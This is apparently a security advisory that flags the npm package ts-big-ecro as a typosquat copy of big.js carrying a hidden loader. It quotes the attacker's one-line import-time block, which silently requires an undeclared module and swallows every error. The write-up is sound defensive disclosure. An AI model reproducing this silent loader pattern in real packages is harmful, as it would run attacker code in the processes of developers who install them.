MAL-2026-6199

Malicious code in ts-big-ecro (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (09cc5687efdad86354f994af9fa7d7c28fbc21d7b5b4558870aba1c05dcf425b)

ts-big-ecro is a verbatim copy of the legitimate big.js library (MikeMcl/big.js v7.0.1) with its name, repository field, and copyright preserved to impersonate the original. Inside the main module (big.js:606 and big.mjs:606), an attacker-inserted block runs at the top level on every require()/import of the package: `try { const doc = require("parket-helper"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. The call fires unconditionally, swallows all errors to evade detection, and loads `parket-helper` — a module that is not declared in dependencies, not documented anywhere, and unrelated to arbitrary-precision arithmetic. The package's only declared dependency is `server-parket@^3.8.1`, which is similarly unrelated to the package's stated purpose (the real big.js has zero runtime dependencies). The combination — typosquat name, verbatim impersonation of a popular library, import-time loader for an undeclared helper module, and a suspicious sibling dependency of a different name — is the standard dependency-confusion trojan-loader pattern. Anyone who installs and requires this package executes attacker-controlled code from `parket-helper` in their process.

Affected packages

npm / ts-big-ecro

No fixed version published yet for ts-big-ecro (npm). Pin to a known-safe version or switch to an alternative.
